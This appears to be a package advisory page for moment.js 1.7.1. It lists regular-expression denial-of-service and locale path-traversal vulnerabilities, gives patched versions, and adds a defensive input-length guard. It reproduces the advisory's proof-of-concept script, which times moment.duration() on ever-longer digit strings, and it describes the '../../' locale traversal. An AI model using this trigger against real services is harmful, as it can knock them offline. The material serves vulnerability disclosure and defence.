Moment.js 1.7.1 is a point release that follows 1.7.0; both are tools for parsing, manipulating and formatting dates in JavaScript. The two versions share the same core functionality and a near-identical structure. 1.7.1 was published roughly two months after 1.7.0, which suggests it carries bug fixes, performance tweaks or minor adjustments rather than new features.
Developers familiar with 1.7.0 will find the transition to 1.7.1 straightforward. The API, the build and test tooling listed in the package manifest (jshint, nodeunit and uglify-js) and the author information are unchanged. Both versions come from Tim Wood's continued work in the same GitHub repository, and both carry the same description, "Parse, manipulate, and display dates".
Given how small the change is, teams still on 1.7.0 can move to 1.7.1 with little risk; the commit history or release notes on the GitHub repository give the precise list of changes. Note, however, that 1.7.1 is itself affected by every advisory listed below (the path traversal advisory alone covers 1.0.1 through 2.29.1), so for security purposes the upgrade target is 2.29.2 or later, not 1.7.1.
All vulnerabilities affecting version 1.7.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration(). The advisory's proof of concept below passes a '-' followed by an ever-longer run of digits and times each call:
var moment = require('moment');

// The PoC declares no loop variable, so `i` is one global shared by both
// loops; that is why COUNT in the output advances by 10001 rather than
// 10000 per iteration. It does not affect the measurement.
var i;

// Build a string of len + 1 copies of chr.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Pass moment.duration() a '-' followed by a run of digits that grows each
// iteration and time the call. On a vulnerable version the time grows
// quadratically with the length rather than linearly.
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start); // elapsed time as [seconds, nanoseconds]
  console.log(end);
}
Output of the PoC as recorded in the advisory (each timing is [seconds, nanoseconds]). The time grows roughly quadratically with input length: tripling the length from 20002 to 60006 characters multiplies the time by about nine, from 0.62 s to 5.65 s.
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Versions of moment prior to 2.19.3 are vulnerable to a low-severity regular expression denial of service when parsing dates from strings.
Update to version 2.19.3 or later.
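A guard that serves both ReDoS advisories above (moment.duration() and date-string parsing), added here as an example; it is not code from moment.js or from the advisories. It assumes a Node request handler that has `require('moment')` available and would otherwise pass request parameters straight to the parser; the length caps, the accepted shapes, the parseWithGuard helper and the stub parser are the example's own choices.

```javascript
// Added example, not moment.js code. Bound untrusted input before it reaches a
// regex-backed parser such as moment.duration() or moment(String). The assumed
// integration point is a request handler that does `const moment = require('moment')`.

// Length caps (assumed): a legitimate duration or timestamp is a few dozen characters.
const MAX_DURATION_LEN = 64;
const MAX_DATE_LEN = 64;

// Shapes we are willing to forward. Every quantifier is bounded, so these checks
// cannot backtrack catastrophically even on hostile input.
const ISO_DURATION = /^-?P(?:\d{1,9}Y)?(?:\d{1,9}M)?(?:\d{1,9}W)?(?:\d{1,9}D)?(?:T(?:\d{1,9}H)?(?:\d{1,9}M)?(?:\d{1,9}(?:[.,]\d{1,9})?S)?)?$/;
const CLOCK_DURATION = /^-?(?:\d{1,4}\.)?\d{1,2}:\d{2}(?::\d{2}(?:\.\d{1,3})?)?$/; // [d.]hh:mm[:ss[.SSS]]
const ISO_DATE = /^\d{4}-\d{2}-\d{2}(?:[T ]\d{2}:\d{2}(?::\d{2}(?:\.\d{1,9})?)?(?:Z|[+-]\d{2}:?\d{2})?)?$/;

function checkInput(value, maxLen, shapes) {
  if (typeof value !== 'string') return { ok: false, reason: 'not a string' };
  // Cheap O(1) check first: a 20 kB "duration" is never legitimate.
  if (value.length > maxLen) return { ok: false, reason: `longer than ${maxLen}` };
  if (!shapes.some((re) => re.test(value))) return { ok: false, reason: 'unexpected shape' };
  return { ok: true, value };
}

const checkDurationInput = (v) => checkInput(v, MAX_DURATION_LEN, [ISO_DURATION, CLOCK_DURATION]);
const checkDateInput = (v) => checkInput(v, MAX_DATE_LEN, [ISO_DATE]);

// Run `check`, and only then hand the value to the real parser, e.g.
//   parseWithGuard(req.query.ttl, checkDurationInput, moment.duration)
//   parseWithGuard(req.query.since, checkDateInput, moment)
function parseWithGuard(value, check, parser) {
  const result = check(value);
  if (!result.ok) throw new RangeError(`rejected input: ${result.reason}`);
  return parser(result.value);
}

// Stand-in parser so the example runs without moment installed; it records the
// length of what reached it, which is exactly what the guard is meant to bound.
function stubParser(s) { return { parsed: s, length: s.length }; }

// Demo: the advisory's attack string ('-' plus a long run of digits, here 60006
// characters like the last PoC iteration) is refused in microseconds, while a
// realistic duration gets through to the parser.
function demo() {
  const attack = '-' + '1'.repeat(60006 - 1);
  const t0 = process.hrtime.bigint();
  let refused = false;
  try { parseWithGuard(attack, checkDurationInput, stubParser); } catch (e) { refused = e instanceof RangeError; }
  const micros = Number(process.hrtime.bigint() - t0) / 1000;
  const ok = parseWithGuard('PT1H30M', checkDurationInput, stubParser);
  return { refused, micros, accepted: ok.parsed };
}

console.log(demo());
```

The cap is the important part: the attack string is refused regardless of what the parser's own regex does, and the bounded-quantifier shapes keep the guard itself linear. The accepted shapes are deliberately narrow; widen them only for formats the application actually needs, and keep every quantifier bounded when you do.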
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability affects npm (server-side) users of moment.js, in particular where a user-provided locale string (for example fr) is passed straight to moment.locale() to switch the locale. On Node the locale loader resolves that name to a file under moment's locale directory, so a name containing path segments such as ../../ makes it load an arbitrary file instead.
The problem is patched in 2.29.2, and the patch can be applied to all affected versions (1.0.1 through 2.29.1 inclusive).
Workaround: sanitize the user-provided locale name (for example, check it against an allowlist of the locales the application ships) before passing it to moment.js.